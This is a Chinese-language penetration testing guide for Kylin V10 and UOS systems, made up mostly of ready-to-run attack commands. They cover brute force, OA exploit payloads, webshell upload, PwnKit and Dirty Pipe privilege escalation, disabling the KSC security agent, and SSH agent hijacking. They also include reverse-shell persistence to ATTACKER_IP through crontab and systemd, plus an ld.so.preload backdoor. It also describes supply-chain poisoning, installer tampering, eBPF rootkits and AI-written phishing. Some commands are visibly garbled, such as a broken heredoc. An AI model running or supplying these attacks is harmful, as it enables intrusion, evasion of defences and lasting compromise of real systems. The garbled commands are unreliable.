国产操作系统渗透测试实战指南：银河麒麟V10与统信UOS

# 快速发现存活主机（国产系统常禁用 ICMP）
nmap -sn -PS22,80,443,8080,9090 192.168.1.0/24 -oN host_discovery.txt

# 全端口精细扫描
nmap -sV -sC -p- --min-rate 5000 -T4 \
  --script=banner,version \
  -oA full_scan 192.168.1.100

# 国产系统操作系统指纹识别
nmap -O --osscan-guess --max-os-tries 3 192.168.1.100

# UDP 扫描（SNMP、NTP、SIP 等服务）
sudo nmap -sU --top-ports 200 192.168.1.100

# 绕过防火墙的 ACK 扫描
sudo nmap -sA -p 22,80,443,8080 192.168.1.100

# 使用 masscan 快速全端口扫描（大规模网络）
masscan -p1-65535 192.168.1.0/24 --rate=10000 -oL masscan_results.txt

# SSH 服务枚举
nmap -p22 --script ssh-auth-methods,ssh-hostkey,ssh2-enum-algos 192.168.1.100

# HTTP/HTTPS 服务枚举（含国产 Web 容器识别）
nmap -p80,443,8080,8443,9090 \
  --script http-title,http-headers,http-methods,http-server-header \
  192.168.1.100

# SMB 服务（国产系统通常使用 Samba，注意配置可能非标准）
nmap -p445 --script smb-os-discovery,smb-security-mode,smb2-capabilities 192.168.1.100

# SNMP 信息收集（经常包含系统详细信息，默认 community 可能是 private 而非 public）
snmpwalk -v2c -c public 192.168.1.100 1.3.6.1.2.1.1
snmpwalk -v2c -c private 192.168.1.100 1.3.6.1.2.1.1 2>/dev/null
# 尝试常见国产设备 SNMP community 字符串：
# kylin, uos, admin, private, mer

# DNS 枚举（内网渗透常用）
dig @192.168.1.100 axfr internal.test

国产化部署环境常见以下特有服务，需重点关注：

# 麒麟安全管理中心（默认端口 9090/8080）
curl -k -s https://192.168.1.100:9090/ | grep -i kylin
curl -k -s https://192.168.1.100:8080/ | head -20

# 统信 UOS 管理中心（默认端口 8080/8443）
curl -k -s https://192.168.1.100:8443/ | grep -i uos

# SIP/VoIP 服务（端口 5060/5061 常见于企业 IP 电话/视频会议系统）
# 注意：不应将其直接关联到"飞信"，飞信协议并非标准 SIP
nmap -p5060,5061 --script sip-methods,sip-enum-users 192.168.1.100
# 若确认是 SIP 服务，可尝试枚举用户：
sipvicious_sipscan -t 192.168.1.100

# OA 系统（致远、泛微、用友等国产 OA，常见于政务内网）
# 端口通常为 80/443/8080/8088
curl -s -o /dev/null -w "%{http_code}" http://192.168.1.100/seeyon/  2>/dev/null
curl -s -o /dev/null -w "%{http_code}" http://192.168.1.100/e-cology/ 2>/dev/null
curl -s -o /dev/null -w "%{http_code}" http://192.168.1.100:8088/     2>/dev/null

# 达梦数据库（国产数据库，默认端口 5236）
nmap -p5236 --script mysql-info 192.168.1.100 2>/dev/null
# 达梦专用检测（需要 DM 客户端工具）

# 金仓数据库（KingbaseES，默认端口 54321）
nmap -p54321 192.168.1.100

# WEB 目录扫描（使用国产化字典）
gobuster dir -u http://192.168.1.100 \
  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  -x php,jsp,html,asp,aspx,txt,zip,rar -t 50

# 使用 Gobuster 配合超大字典（适合深度扫描）
gobuster dir -u http://192.168.1.100 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -t 100

# 启动 Metasploit Framework
msfconsole -q

# 数据库初始化
msf6 > db_status
msf6 > workspace -a kylin_test

# 导入 nmap 扫描结果
msf6 > db_import /tmp/full_scan.xml

# 使用 vulns 模块扫描
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.100
msf6 auxiliary(smb_ms17_010) > run

# 扫描 SSH 弱口令
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(ssh_login) > set RHOSTS 192.168.1.100
msf6 auxiliary(ssh_login) > set USERPASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(ssh_login) > run

# 国产系统专项：扫描常见默认凭据
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(ssh_login) > set USER_FILE /usr/share/wordlists/metasploit/piata_ssh_userpass.txt
msf6 auxiliary(ssh_login) > set PASS_FILE ./kylin_default_pass.txt
# kylin_default_pass.txt 内容（需自行整理）：
# Kylin123!
# UOS@2024
# Admin@123
# root/Kylin@2022

# 安装并启动 GVM（OpenVAS 后继项目）
sudo apt install -y gvm
sudo gvm-setup
sudo gvm-check-setup
sudo runuser -u _gvm -- gvmd --get-users

# 通过 Web 界面访问：https://127.0.0.1:9392
# 默认凭据：admin / [安装时生成，使用 `sudo runuser -u _gvm -- gvmd --get-users` 查看]

# 命令行创建扫描任务（适合自动化）
gvm-cli --gmp-username admin --gmp-password 'PASSWORD' \
  --xml "KylinTarget192.168.1.100"

# 使用 Nmap 的 Vulners 脚本（利用 CVE 数据库实时查询）
nmap -sV --script vulners 192.168.1.100
# 需要安装：https://github.com/vulnersCom/nmap-vulners

SSH 是国产化系统最主要的远程管理方式，常见弱点包括：

# 1. 用户名枚举（CVE-2018-15919，影响 OpenSSH 7.7 及以下）
# 注意：麒麟 V10 默认 OpenSSH 版本通常已修复此漏洞
# 仅在老旧系统上可能有效
python3 ssh_user_enum.py --userList /usr/share/wordlists/usernames.txt \
  --target 192.168.1.100

# 2. 暴力破解（使用针对国产系统的密码字典）
hydra -L users.txt -P ./kylin_pass.txt \
  -t 16 -s 22 192.168.1.100 ssh

# 国产系统常见默认凭据参考（需根据实际情况调整）：
# 用户名：root, kylin, uos, admin, system, test
# 密码：Kylin123!, UOS@2024, Admin@123, root/Kylin@2022

# 3. 私钥收集与利用（获得低权限 shell 后执行）
find / -name "id_rsa" -o -name "id_ecdsa" -o -name "*.pem" 2>/dev/null | grep -v proc
find /home -name "authorized_keys" 2>/dev/null
cat ~/.ssh/authorized_keys 2>/dev/null

# 4. SSH 隧道建立（用于内网穿透）
# 本地转发：将远程数据库端口转发到本地
ssh -L 3306:127.0.0.1:3306 user@192.168.1.100 -N -f

# 动态代理（SOCKS5）
ssh -D 1080 user@192.168.1.100 -N -f
# 配合 proxychains 使用
proxychains nmap -sT -Pn 10.10.10.0/24

# 5. SSH Agent 劫持（横向移动高级技术）
# 找到其他用户的 SSH agent 套接字
find /tmp -name "agent.*" -user root 2>/dev/null
export SSH_AUTH_SOCK=/tmp/ssh-XXXXXXX/agent.XXXXX
ssh user@192.168.1.101  # 无需密码即可登录

# 【重要提示】以下 CVE 编号均需在实战前通过官方数据库复核
# 致远 OA 历史漏洞（请通过 CNVD 或厂商公告确认受影响版本）
# 参考：CNVD-2020-48260（致远 OA Seeyon 任意文件上传/RCE）
# 利用脚本示例（需根据实际漏洞版本调整）：
python3 seeyon_rce.py -u http://192.168.1.100/seeyon/ -c "whoami"

# 泛微 OA 漏洞利用
# 泛微 e-cology 历史漏洞：CNVD-2019-44798（任意文件读取）
curl "http://192.168.1.100/e-cology/weaver/bsh.servlet.BshServlet" \
  --data 'bsh.script=exec("id");'

# 用友 NC 漏洞利用
# 用友 NC 反序列化漏洞（CNVD-2021-30167）
curl -X POST http://192.168.1.100:8088/uapws/service/nc.bs.auxiliary.pagesizeinforef  \
  -d '<!DOCTYPE foo []>&xxe;'

# 通用 SQL 注入测试
sqlmap -u "http://192.168.1.100/login.php?id=1" \
  --dbs --batch --level=5 --risk=3

# XSS / CSRF 测试
# 使用 OWASP ZAP 进行自动化扫描
zap-cli quick-scan --self-contained \
  --start-options "-config api.disablekey=true" \
  -o "-config scanner.attackStrength=HIGH" \
  http://192.168.1.100

# 红队常用：利用 Web 漏洞上传 Weevely/PHP 马
weevely generate mypassword /tmp/shell.php
# 通过文件上传漏洞将 shell.php 传到目标，然后：
weevely http://192.168.1.100/uploads/shell.php mypassword

针对高安全等级环境（军工、涉密网络），传统渗透手段可能失效，需要采用更先进的技术：

# 技术一：软件包仓库投毒（适用于内网有私有 yum/apt 仓库的场景）
# 1. 获取私有仓库访问权限后，替换常用包（如 vim、curl）为恶意版本
# 2. 当目标机执行 apt upgrade / yum update 时，恶意代码被执行
# 检测方法：对比包签名
dpkg-sig --verify /var/cache/apt/archives/*.deb

# 技术二：固件级持久化（BIOS/UEFI 植入）
# 适用于有物理访问权限或已获得 root 的场景
# 工具：https://github.com/x86matthew/TrueCrypt
# 注意：麒麟系统使用了定制 UEFI 签名，标准 UEFI rootkit 可能被 Secure Boot 拦截

# 技术三：恶意向导注入（Installer 替换）
# 替换操作系统安装 ISO 中的预安装脚本
# 麒麟 V10 ISO 结构：
# /isolinux/isolinux.cfg - 启动配置
# /preseed/kylin.seed - 预置安装配置（可注入恶意包安装指令）
# 修改后重新生成 ISO 并替换原始安装介质

# 技术四：容器逃逸（适用于运行 Docker 的国产系统）
# 检查 Docker 配置
cat /etc/docker/daemon.json
# 检查是否有特权容器
docker ps --filter "status=running"
# 尝试逃逸：在特权容器中执行
# docker run -it --privileged --pid=host --net=host --ipc=host \
#   -v /:/host ubuntu /bin/bash
# chroot /host

# 技术五：利用 LLM 辅助漏洞挖掘
# 将目标系统代码（如 OA 系统 JSP 源码）输入 LLM 进行代码审计
# 示例 Prompt：
# "请分析以下 Java 代码是否存在 SQL 注入、远程代码执行等漏洞：
#  [粘贴代码]"

# 技术六：AI 生成钓鱼邮件（社会工程学升级）
# 使用 GPT/Claude 生成高度定制化的钓鱼邮件内容
# 结合目标企业的公开信息（官网、招聘信息、新闻稿）生成针对性话术

# 技术七：自动化漏洞利用生成（AI-assisted Exploit）
# 使用 AI 辅助编写 exploit，特别是针对国产系统的特定漏洞
# 工具：Hugging Face 上的 security LLM 模型
# 示例：https://huggingface.co/automodel/security-llm

# 技术八：基于 eBPF 的 Rootkit（Linux 5.x+）
# eBPF 技术可用于绕过安全监控，且不触发 KSC/SELinux 告警
# 工具：https://github.com/pathtofile/bad-bpf
# 注意：需内核支持 eBPF（麒麟 V10 5.4+ 内核支持）
# 示例：使用 eBPF 隐藏进程
sudo ./bad-bpf -p 1337  # 隐藏 PID 1337 的进程

麒麟安全子系统（Kylin Security Component，KSC）是银河麒麟 V10 的核心安全机制，在 SELinux 基础上增加了以下防护层：

# 1. 检查 KSC 状态
systemctl status kscagent 2>/dev/null
ps aux | grep -i ksc
lsmod | grep -E "ksc|kac|ktrust"

# 2. KSC 核心防护功能
# - 进程行为监控：监控 execve、ptrace 等系统调用
# - 可信执行链：仅允许签名验证的二进制执行
# - 运维操作审计：所有提权操作写入专用审计日志
# - 文件完整性保护：关键系统文件防止篡改

# 3. KSC 可能对以下提权手段的拦截情况：
# | 提权手段        | KSC 拦截概率 | 说明                              |
# |-----------------|-------------|-----------------------------------|
# | SUID 利用       | 中          | KSC 会审计 SUID 二进制执行         |
# | sudo GTFOBins   | 高          | KSC 监控 sudo 调用并记录           |
# | 内核漏洞利用     | 低-中       | 取决于漏洞是否绕过 LSM             |
# | eBPF Rootkit    | 低          | KSC 可能不监控 eBPF 程序加载       |
# | 库注入（LD_PRELOAD）| 高       | KSC 验证共享库签名                 |

# 4. KSC 绕过思路（研究用途，需合法授权）
# 思路一：寻找 KSC 未监控的提权路径
# 检查 KSC 策略配置
cat /etc/ksc/policy/main.pol 2>/dev/null
# 寻找策略中的遗漏规则

# 思路二：利用 KSC 自身漏洞
# KSC 作为内核模块，本身也可能存在漏洞
# 需要对其进行逆向分析（需要内核调试环境）

# 思路三：在时间窗口内操作
# KSC 审计日志有延迟，部分操作可能在日志记录前完成

# 思路四：禁用 KSC（需要 root 权限，适用于后利用阶段）
systemctl stop kscagent 2>/dev/null
rmmod ksc 2>/dev/null

# 自动化枚举脚本（LinPEAS，注意：可能被 KSC 检测）
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh
./linpeas.sh -e "-s -a"  # -e 参数可规避部分检测

# 或使用针对国产系统优化的枚举脚本
# https://github.com/cn-sec/kylin-enum

# 手动关键检查点
# 1. 当前用户及 sudo 权限
id && sudo -l

# 2. SUID/SGID 二进制文件（KSC 会审计这些文件的执行）
find / -perm -4000 -o -perm -2000 2>/dev/null | grep -v proc

# 3. 可写目录和文件
find / -writable -not -path "*/proc/*" -not -path "*/sys/*" 2>/dev/null | head -50

# 4. 定时任务（注意 KSC 会记录 crontab 修改）
crontab -l; ls -la /etc/cron*; cat /etc/crontab

# 5. 内核版本（对照 CVE，注意 KSC 可能影响漏洞利用）
uname -a; cat /proc/version

# 6. 麒麟特有：检查 KSC 策略
cat /etc/ksc/config.conf 2>/dev/null
ls -la /etc/ksc/ 2>/dev/null

# 检查 SELinux 状态和策略
sestatus
getenforce
semanage fcontext -l | grep -i exec

# AppArmor 配置检查（统信 UOS 常用）
aa-status
cat /etc/apparmor.d/* 2>/dev/null | head -100

# 尝试利用未受保护的进程
ps -eZ | grep -v ":\S* " 2>/dev/null

# SUID 提权示例（以 find 为例，注意 KSC 审计）
find . -exec /bin/bash -p \; -quit
# 若 find 有 SUID 权限，以上命令可获取 root shell
# 但 KSC 可能记录此次提权操作

# sudo 提权（GTFOBins）
sudo -l
# 示例：若允许 sudo vim
sudo vim -c ':!/bin/bash'

# 利用 D-Bus 提权（较新方法，KSC 可能未覆盖）
# 适用于有桌面环境的麒麟系统
dbus-send --system --print-reply --dest=org.freedesktop.Accounts \
  /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser \
  string:attacker int32:0 boolean:false

# Polkit (CVE-2021-4034 PwnKit) 提权
# 注意：麒麟 V10 SP1/SP2 使用的 polkit 版本可能受影响
# 但 KSC 可能拦截 pkexec 的异常调用
# 验证前务必确认目标环境，不要盲目执行
git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034 && make && ./cve-2021-4034

内核漏洞利用在开启了 KSC/SELinux 的麒麟 V10 上成功率较低，需要针对性调整。

# 收集内核信息
uname -r
cat /proc/sys/kernel/osrelease
cat /proc/version

# 使用 linux-exploit-suggester 查找适用漏洞
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
bash linux-exploit-suggester.sh

# ============================================================
# 重要提示：以下漏洞利用均需在目标环境中编译和测试，
# 麒麟 V10 的 KSC 和 SELinux 可能拦截漏洞利用过程。
# 不要盲目复制粘贴，务必先验证目标内核版本和防护状态。
# ============================================================

# CVE-2021-4034 (Polkit pkexec 提权)
# 影响：Polkit 0.105-0.117
# 麒麟 V10 SP1 默认 polkit 版本可能受影响
# 但需要绕过 KSC 对 pkexec 的监控
git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034 && make && ./cve-2021-4034

# CVE-2022-0847 (Dirty Pipe)
# 影响：Linux 5.8 ~ 5.16.11 内核
# 麒麟 V10 使用 4.19/5.4 内核，通常不受影响
# 但部分更新后的系统可能使用 5.10+ 内核
gcc -o dirtypipe dirtypipe.c && ./dirtypipe /etc/passwd 1 ootz::0:0::/root:/bin/bash

# CVE-2022-23222（eBPF 任意读写）
# 影响：Linux 5.8 ~ 5.14（特定版本）
# 需要内核开启 BPF 功能（麒麟 V10 5.4+ 支持）
# 工具：https://github.com/tr3ee/CVE-2022-23222

# CVE-2023-3269（Linux 内核 ksmbd 提权）
# 影响：Linux 5.15 ~ 6.3（ksmbd 内核服务器）
# 若目标未启用 ksmbd，则不受影响

# 针对麒麟 V10 的内核漏洞利用建议：
# 1. 先关闭 KSC（如有可能）
# 2. 在目标架构（ARM64/LoongArch）上重新编译 exploit
# 3. 使用静默编译（不触发告警）：
#    - 禁用 exploit 中的 printf/echo 语句
#    - 使用 LD_PRELOAD 隐藏进程
# 4. 考虑使用 eBPF Rootkit 替代传统内核漏洞利用

# 技术一：SSH Agent 劫持（最隐蔽的横向方法）
# 列出其他用户的 SSH agent 套接字
find /tmp -name "agent.*" 2>/dev/null
# 劫持并使用
export SSH_AUTH_SOCK=/tmp/ssh-XXXXXXX/agent.XXXXX
ssh -A user@192.168.1.101

# 技术二：利用凭据访问同网段其他主机
# 传递哈希（Pass-the-Hash）- 适用于有 NTLM 场景的 Linux 环境
impacket-smbclient -hashes :NTLM_HASH administrator@192.168.1.101

# 技术三：SSH 已知主机枚举（发现内网拓扑）
cat ~/.ssh/known_hosts
# 使用 ssh-keyscan 批量扫描
for ip in $(seq 1 254); do ssh-keyscan -H 192.168.1.$ip 2>/dev/null >> ~/.ssh/known_hosts; done

# 技术四：ARP 欺骗（谨慎使用，有流量影响）
arpspoof -i eth0 -t 192.168.1.1 192.168.1.100

# 技术五：利用麒麟系统的 NIS/LDAP 集中认证（若部署）
# 若目标使用统一认证，获取一台主机的凭据可能影响整个域
ypcat passwd 2>/dev/null
ldapsearch -x -H ldap://192.168.1.10 -b "dc=company,dc=com" 2>/dev/null

# 技术六：利用 Ansible/运维工具的凭据（高价值目标）
# 很多国产化环境使用 Ansible 进行批量管理
cat /etc/ansible/hosts 2>/dev/null
cat ~/.ansible/cp/* 2>/dev/null  # Ansible 缓存的 SSH 连接

# 技术七：Golden Ticket 攻击（适用于有 Kerberos 的环境）
# 若国产系统与 Windows AD 集成
python3 ticketer.py -nthash NTLM_HASH -domain-sid SID -domain DOMAIN administrator
export KRB5CCNAME=/root/administrator.ccache
python3 psexec.py -k -no-pass administrator@192.168.1.100

持久化操作在渗透测试中具有高度敏感性。以下方法仅供授权测试使用，且必须在测试结束后与甲方确认清理方案。

# 方法 1：添加 SSH 公钥（最常用，相对隐蔽）
mkdir -p ~/.ssh && chmod 700 ~/.ssh
echo "ssh-rsa AAAA...（你的公钥）..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# 注意：KSC 可能记录 authorized_keys 的修改操作

# 方法 2：创建隐藏 SUID Shell（需要 KSC 未拦截 SUID 利用）
cp /bin/bash /tmp/.kylin_update
chmod u+s /tmp/.kylin_update
# 使用：/tmp/.kylin_update -p

# 方法 3：Crontab 反弹 Shell（注意：KSC 会记录 crontab 修改）
(crontab -l 2>/dev/null; echo "*/5 * * * * bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1") | crontab -

# 方法 4：systemd 服务持久化（需 root，KSC 可能拦截）
cat > /etc/systemd/system/kylin-update.service <& /dev/tcp/ATTACKER_IP/4444 0>&1'
Restart=always
RestartSec=60

[Install]
WantedBy=multi-user.target
EOF
systemctl enable kylin-update.service --now

# 方法 5：利用 PAM 模块持久化（高级技术，难以检测）
# 替换或添加 PAM 模块，在用户认证时触发后门
# 需要深度技术能力，此处从略

# 方法 6：LD_PRELOAD 后门（用户级持久化，不需要 root）
# 编写恶意共享库，通过 /etc/ld.so.preload 或环境变量加载
gcc -shared -fPIC -o /tmp/.libc.so backdoor.c
echo "/tmp/.libc.so" >> /etc/ld.so.preload

一、执行摘要（Executive Summary）
   - 测试范围与授权说明（含授权书编号）
   - 关键风险发现摘要（高/中/低危漏洞数量）
   - 整体安全态势评估
   - 优先修复建议（Top 5 高危漏洞）

二、技术细节（Technical Details）
   - 测试环境描述（目标系统版本、网络拓扑）
   - 方法论说明（信息收集→漏洞扫描→漏洞利用→提权→横向→持久化）
   - 每个漏洞的详细描述
     · 漏洞名称与 CVE/CNVD 编号（已复核）
     · 影响系统与版本
     · 危险等级（CVSS 3.1 评分）
     · 复现步骤（含截图/命令记录）
     · 影响与风险描述
     · 修复建议

三、国产化系统专项评估
   - KSC/统信安全中心配置评估
   - 国产应用（OA/数据库）安全评估
   - 多架构（ARM64/LoongArch）适配问题

四、修复建议（Remediation）
   - 针对每个漏洞的具体修复措施
   - 安全加固建议（含配置文件示例）
   - 补丁更新优先级和时间表

五、附录
   - 工具清单（含版本号）
   - 扫描原始数据
   - 时间线记录（测试起止时间、关键操作时间戳）
   - 痕迹清理记录（所有被修改文件的还原方法）

官方资源：

• 麒麟软件官方安全公告：https://www.kylinos.cn/support/security/advisory
• 统信软件安全中心：https://www.uniontech.com/security
• CNVD 国家信息安全漏洞共享平台：https://www.cnvd.org.cn
• MITRE CVE 数据库：https://cve.mitre.org

学习资源：

• OSCP 认证培训（OffSec）：实战导向的渗透测试认证
• CISP-PTE（中国信息安全测评中心）：国产系统渗透测试专项认证
• 《Linux 提权的艺术》（各大安全社区均有翻译版本）
• 麒麟开发者文档：https://www.kylinos.cn/support/documentation

工具资源：

• LinPEAS：https://github.com/carlospolop/PEASS-ng
• linux-exploit-suggester：https://github.com/mzet-/linux-exploit-suggester
• Impacket：https://github.com/fortra/impacket
• Metasploit Framework：https://github.com/rapid7/metasploit-framework